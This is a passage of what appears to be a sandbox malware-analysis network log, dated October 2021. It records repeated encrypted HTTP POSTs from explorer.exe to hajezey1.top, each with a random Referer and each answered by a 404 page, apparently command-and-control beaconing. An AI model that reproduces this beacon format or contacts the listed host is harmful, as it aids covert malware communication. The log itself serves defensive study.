20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.2.4	49846	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:14.805903912 CEST	7518	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://muywwft.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 149 Host: hajezey1.top
Oct 29, 2021 20:50:14.805927992 CEST	7518	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 87 66 5d 02 c8 a1 c1 64 1b b7 c9 79 Data Ascii: 6152Ek\lwmwu$f]dyIaQPgO4RyVeEc'z'dB9v^`b}r[z?5D
Oct 29, 2021 20:50:14.886051893 CEST	7519	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:14 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.2.4	49847	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:15.499891996 CEST	7519	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yfayr.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 271 Host: hajezey1.top
Oct 29, 2021 20:50:15.499919891 CEST	7520	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 84 66 5d 02 c8 a1 c1 64 5e 8b 90 0e Data Ascii: 6152Ek\lwmwu$f]d^IVF<zkL[(&nhnP]$w$^ QXJF(+OU`26-Xb"eg"6?AsFq`/2p+Dc)sai*UOsdzxH
Oct 29, 2021 20:50:15.582477093 CEST	7520	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:15 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.2.4	49848	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:15.778964043 CEST	7521	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sivhm.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 293 Host: hajezey1.top
Oct 29, 2021 20:50:15.779009104 CEST	7521	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 85 66 5d 02 c8 a1 c1 64 21 a6 86 34 Data Ascii: 6152Ek\lwmwu$f]d!4<w4ybU1Bde6m1g`EoA&,%VtFb/=B-fKD;n(F}7i,ml&\|sNc#sw_E&wu[\|&#^
Oct 29, 2021 20:50:15.858735085 CEST	7522	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:15 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.2.4	49849	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:16.521620035 CEST	7523	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uwebveg.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 332 Host: hajezey1.top
Oct 29, 2021 20:50:16.521656990 CEST	7523	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 82 66 5d 02 c8 a1 c1 64 42 ae 89 67 Data Ascii: 6152Ek\lwmwu$f]dBg}%V)\A!KmAmm\|-&";^][u:x?w>$ U&O9oh_yK vOnJw]VaHHyKl_{_Vcra.U!
Oct 29, 2021 20:50:16.600121021 CEST	7524	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:16 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.2.4	49850	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:16.904588938 CEST	7525	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lsmjboth.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 160 Host: hajezey1.top
Oct 29, 2021 20:50:16.904608011 CEST	7525	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 83 66 5d 02 c8 a1 c1 64 24 9f 9b 37 Data Ascii: 6152Ek\lwmwu$f]d$7Q=N&y{-f7}mh},3b>_GYnzz[(nMs\CMlK
Oct 29, 2021 20:50:16.985292912 CEST	7662	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:16 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	192.168.2.4	49851	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:18.329341888 CEST	8549	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ucowlihgbp.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 288 Host: hajezey1.top
Oct 29, 2021 20:50:18.330640078 CEST	8549	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 80 66 5d 02 c8 a1 c1 64 27 99 ac 28 Data Ascii: 6152Ek\lwmwu$f]d'(QJjdw2CEGimwS9n,9NM!l7{Iu9EQ_UXY?z)"0sW=*+ wDOx(]vf/^:ip7$WT
Oct 29, 2021 20:50:18.410227060 CEST	8550	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:18 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	192.168.2.4	49852	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:18.514930010 CEST	8550	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vchmiecd.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 351 Host: hajezey1.top
Oct 29, 2021 20:50:18.516788960 CEST	8551	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 81 66 5d 02 c8 a1 c1 64 2b 83 8d 1f Data Ascii: 6152Ek\lwmwu$f]d+qq`+s}2"tbNbv+iz9<85zF(@{:MVB*};<Hpdb]3S6<%I=9Is.[Y&!I)J`1veZ3l5HafL4
Oct 29, 2021 20:50:18.591012955 CEST	8552	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:18 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	192.168.2.4	49853	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:18.722199917 CEST	8552	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pmltrxuim.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 130 Host: hajezey1.top
Oct 29, 2021 20:50:18.722210884 CEST	8553	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de be 66 5d 02 c8 a1 c1 64 29 de d6 37 Data Ascii: 6152Ek\lwmwu$f]d)7 NMKtBiI0zvORFjhLZB:9?
Oct 29, 2021 20:50:18.799061060 CEST	8553	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:18 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / 